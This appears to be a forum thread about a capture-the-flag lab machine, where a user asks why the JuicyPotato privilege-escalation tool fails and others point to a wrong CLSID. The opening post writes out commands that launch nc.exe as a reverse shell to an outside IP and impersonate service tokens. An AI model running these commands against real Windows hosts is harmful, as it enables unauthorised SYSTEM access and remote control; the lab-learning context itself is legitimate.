JuicyPotato in DEVEL

so i have compiled Juicypotato to work with x86
but when i run
.\j.exe -l 1338 -p c:\tmp\nc.exe -a "-e cmd.exe 10.10.14.68 443" -t * -c "{A47979D2-C419-11D9-A5B4-001185AD2B89}"

i have no shell
even if i run
.\j.exe -p c:\windows\system32\cmd.exe -t * -l 1338 -c "{A47979D2-C419-11D9-A5B4-001185AD2B89}"

i stay in USER MODE, no privileges
what might be the problem?

log from Juicypotato :

Testing {A47979D2-C419-11D9-A5B4-001185AD2B89} 1338
......
[+] authresult 0
{A47979D2-C419-11D9-A5B4-001185AD2B89};NT AUTHORITY\LOCAL SERVICE

[+] CreateProcessWithTokenW OK

Comments

  • The CLSID "{A47979D2-C419-11D9-A5B4-001185AD2B89}" you are trying to reflect is not running as local system but as local service.
    Local service cannot create interactive windows out of Session 0. As far as i undersand you are running in Session != 0 as an interactive user so you can't see any window created on your Session. Try to change the CLSID and be sure you choose one that is running as Local System.

    splintercode

  • u were right. thnk you!

  • Type your comment> @talboris said:

    u were right. thnk you!

    could you post the right clsid ?

    peek

  • Try forcing CreateProcessAsUser() call (-t u) you will get a semi working shell... but all this doesn't make sense, why should you use a clisd which impersonates a local/network service ?

  • @peek said:
    Type your comment> @talboris said:

    u were right. thnk you!

    could you post the right clsid ?

    If you don't specify the CLISD it will use BITS, otherwise here you can find a plenty of them https://github.com/decoder-it/juicy-potato/blob/master/CLSID/README.md

  • Type your comment> @peek said:

    Type your comment> @talboris said:

    u were right. thnk you!

    could you post the right clsid ?

    dont remember already, it was one of the BITS

  • edited January 23

    @talboris did you get juicypotato32 to work on devel? I'm having issues with BITS not being started/running and i think that is why is doesn't work for me?
    I've also tried with the CLSID for ShellHWDetection but no dice

    EDIT: i spoke too soon... i got it to work.

Sign In to comment.